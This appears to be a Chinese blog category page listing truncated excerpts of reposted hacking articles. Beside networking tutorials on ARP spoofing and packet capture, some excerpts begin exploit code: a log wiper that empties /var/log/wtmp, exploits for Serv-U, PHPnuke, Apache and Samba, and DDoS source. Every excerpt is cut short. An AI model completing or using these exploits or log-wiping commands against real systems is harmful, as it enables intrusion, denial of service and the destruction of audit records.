
源代码文档
文章平均质量分 82
superhacker110
这个作者很懒,什么都没留下…
展开
-
洗脚走路的源代码
#include#include#include#include main(){ int fp;system("echo>/var/log/wtmp");if((fp=open("/var/log/wtmp",O_TRUNC,0))==-1){printf("Cleaned /var/log/wtmp.......BAD!/n/n");close(fp);} else{ printf("Clean原创 2004-11-05 01:07:00 · 805 阅读 · 2 评论 -
Serv-u Ftp Server 本地权限提升漏洞的终极防御
Serv-u Ftp server(以下简称Serv-u)是一个应用比较广泛的Ftp Server,功能强大,使用方便,Serv-u>3.x版本存在本地权限提升漏洞,使用guest权限结合Exp可以以system权限运行程序,通过Webshell结合Exp提升权限已经成了很常用提升方法。漏洞简介: 漏洞是使用Serv-u本地默认管理端口,以默认管理员登陆新建域和用户来执行命令,Ser原创 2004-11-27 00:50:00 · 1281 阅读 · 0 评论 -
手把手教你玩转ARP包(完)【数据包的游戏系列之一】
手把手教你玩转ARP包(完)【数据包的游戏系列之一】 作者: 优快云 VC/MFC 网络编程 PiggyXP ^_^ 本篇目录: 四。ARP包的游戏 1 . 小伎俩 2. ARP欺骗的实现 3. 基于ARP欺骗的监听原理 四.ARP包的游戏既然我们可以自己来填充数据包,那原创 2004-11-30 00:39:00 · 1776 阅读 · 0 评论 -
Serv-U ftp server 密码算法
测试环境:SERV-U 4.1 & 5.0 & 5.004测试结果:测试通过测试方法:输入明文后点提交,而后将下面文本框中的散列复制下来,粘贴到Serv-U的ServUDaemon.ini文件中,而后重新启动Serv-u服务。即可测试密码是否正确。测试时发现,直接在INI文件中添加的账户,无须启动SERV-U即可登陆,但如果你同时添加了一些虚拟目录的话,虚拟目录需要服务器重起时才能生效。另外,如果原创 2004-11-27 00:51:00 · 1122 阅读 · 0 评论 -
手把手教你捕获数据包(上)【数据包的游戏系列之二】
手把手教你捕获数据包(上)【数据包的游戏系列之二】 前 言 经常看到论坛有人问起关于数据包的截获、分析等问题,幸好本人也对此略有所知,也写过很多的sniffer,所以就想写一系列的文章来详细深入的探讨关于数据包的知识。我希望通过这一系列的文章,能使得关于数据包的知识得以普及,所以这系列的每一篇文章我都会有由浅入深的解释、详细的分析、以及编码步骤,另外附上带有详细注释的源码原创 2004-11-30 00:33:00 · 1172 阅读 · 0 评论 -
手把手教你玩转ARP包(三)【数据包的游戏系列之一】
手把手教你玩转ARP包(三)【数据包的游戏系列之一】 作者:优快云 VC/MFC 网络编程 PiggyXP ^_^ 目录: 二。发送数据包的编程实现 1. 填充数据包 2. 发送数据包三。一些附加步骤及说明 1. 如果在VC中使用winpcap 2. 获得网卡信息列表 3. 获得系统ARP信息列表原创 2004-11-30 00:38:00 · 1506 阅读 · 0 评论 -
网卡MAC地址相关信息大全(整理)(上)
网卡MAC地址相关信息大全(整理)(上) 首先要感谢jzyhummel(刀锋[篱影]) 兄弟提供的部分资料^_^ 网卡地址这个概念有点混淆不清。因为实际上有两个地址,mac地址和物理地址,一般说网卡地址我是指物理地址,不知道别人怎么看?物理地址指的是网卡上的存放地址的ROM里的地址,mac地址是这块卡工作的时候用的地址,一般情况下这两个地址是一样的,所以很多人都混用了,甚至不知道原创 2004-11-30 00:42:00 · 1611 阅读 · 0 评论 -
手把手教你捕获数据包(下)【数据包的游戏系列之二】
B. 打开相应网卡并设置为混杂模式: 在此之前肯定要有一段让用户选择网卡、并获得用户选择的网卡的名字的代码,既然上面已经可以获得所有网卡的名字了,这段代码就暂且略过了。 我们主要是要用到 pcap_open_live 函数,不过这个函数winpcap的开发小组已经建议用pcap_open 函数来代替,不过因为我的代码里面用的就是pcap_open_live,所以也不便于修改了,不过原创 2004-11-30 00:35:00 · 996 阅读 · 1 评论 -
IP地址精解
IP地址精解 [网络基础知识]==-IP地址精解-== 为什麽我们要学二进位哎呀还不是该死的蠢电脑嘛它只懂得0和1那麽我们要和电脑沟通的时候也只好装蠢一些才行。当电脑要处理IP运算的时候最终是以二进位的形式进行的。 我们人类最习惯的运算规则是十进位也就是从0到9为一圈回到零的时候就进一位数而我们前面讨论的bit和byte则是八进位即0到7为一圈回到零就进一位数另外还有十六进位由0到15为一原创 2004-11-30 00:57:00 · 1705 阅读 · 2 评论 -
创建SvcHost.exe调用的服务原理与实践
创建SvcHost.exe调用的服务原理与实践 1. 多个服务共享一个Svchost.exe进程利与弊 windows 系统服务分为独立进程和共享进程两种,在windows NT时只有服务器管理器SCM(Services.exe)有多个共享服务,随着系统内置服务的增加,在windows 2000中ms又把很多服务做成共享方式,由svchost.exe启动。windows 2000一般有原创 2004-11-30 00:46:00 · 1484 阅读 · 0 评论 -
手把手教你玩转ARP包(一)【数据包的游戏系列之一】
手把手教你玩转ARP包(一)【数据包的游戏系列之一】 前 言 首先要感谢网络安全资深专家卢湖川博士以及VC网络版的limin朋友提供的资料以及帮助^_^经常看到论坛有人问起关于数据包的截获、分析等问题,幸好本人也对此略有所知,所以就想写一系列的文章来详细深入的探讨关于数据包的知识,,我希望通过这一系列的文章,能使得关于数据包的知识得以普及,所以这系列的每一篇文章我原创 2004-11-30 00:40:00 · 1871 阅读 · 0 评论 -
最新sql溢出源代码(概念版)
最新sql溢出源代码(概念版)#!/usr/bin/php// Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept// By aCiDBiTS acidbits@hotmail.com 24-July-2004//// Nucleus CMS (http://nucl原创 2004-11-06 03:41:00 · 1488 阅读 · 0 评论 -
SERV-U本地溢出源代码
RhinoSoft Serv-U 5.1.0.0RhinoSoft Serv-U 5.0.0.9RhinoSoft Serv-U 5.0.0.4RhinoSoft Serv-U 5.0RhinoSoft Serv-U 4.1.0.3RhinoSoft Serv-U 4.1.0.11RhinoSoft Serv-U 4.0.0.4RhinoSoft Serv-U 4.0.0.0RhinoSoft原创 2004-11-24 00:30:00 · 1012 阅读 · 0 评论 -
PHPnuke 6.x_exp and 5.x_exp
#!/usr/bin/php -qPHPnuke 6.x and 5.x fetch author hash by pokleyzz /*# PHPnuke 6.x and 5.x fetch author hash by pokleyzz # 27th December 2003 : 4:54 a.m## bug found by pokleyzz (11th December 2003 )原创 2004-11-24 00:33:00 · 859 阅读 · 0 评论 -
DDOS程序源代码
DOS.c /******************** DOS.c *****************/ #include #include #include #include #include #include #include #include #include #define DESTPORT 80 /* 要攻击的端口(WEB) */ #define LOCALPORT 8原创 2004-11-24 00:38:00 · 858 阅读 · 0 评论 -
Samba 3.x SWAT预验证远程缓冲区溢出漏洞[代码]
Samba 3.x SWAT预验证远程缓冲区溢出漏洞[代码] 受影响系统 Samba 3.0.2 Samba 3.0.3 Samba 3.0.4详细描述SWAT是Samba Web管理工具。 Samba SWAT服务预验证存在缓冲区溢出问题,远程攻击者可以利用这个漏洞在系统上以SWAT进程权限执行任意指令。问题存在于sourc原创 2004-11-24 00:39:00 · 736 阅读 · 0 评论 -
Apache/1.3.29 - Remote Root Exploit
Apache/1.3.29 - Remote Root Exploit unsigned char h3llc0de[]={ 0x23, 0x21, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x70, 0x65, 0x72, 0x6c, 0x0a, 0x0a, 0x24, 0x63, 0x68, 0x61, 0x6e, 0x3d,原创 2004-11-24 00:42:00 · 956 阅读 · 0 评论 -
Linux内核文件offset指针敏感信息泄露漏洞
Linux内核文件offset指针敏感信息泄露漏洞 受影响系统: Linux kernel 2.6.7Linux kernel 2.6.6Linux kernel 2.6.5Linux kernel 2.6.4Linux kernel 2.6.3Linux kernel 2.6.2Linux kernel 2.6.1Linux kernel 2.6Linux kernel 2.4.9Linux原创 2004-11-24 00:43:00 · 792 阅读 · 0 评论 -
手把手教你玩转ARP包(二)【数据包的游戏系列之一】
作者: 优快云 VC/MFC 网络编程 PiggyXP ^_^ 目录: 一. 关于ARP协议的基础知识 3. ARP包的填充二。发送数据包的编程实现 1.填充数据包 .........................紧接上文............................ 3.ARP包的填充1) 请求原创 2004-11-30 00:37:00 · 979 阅读 · 0 评论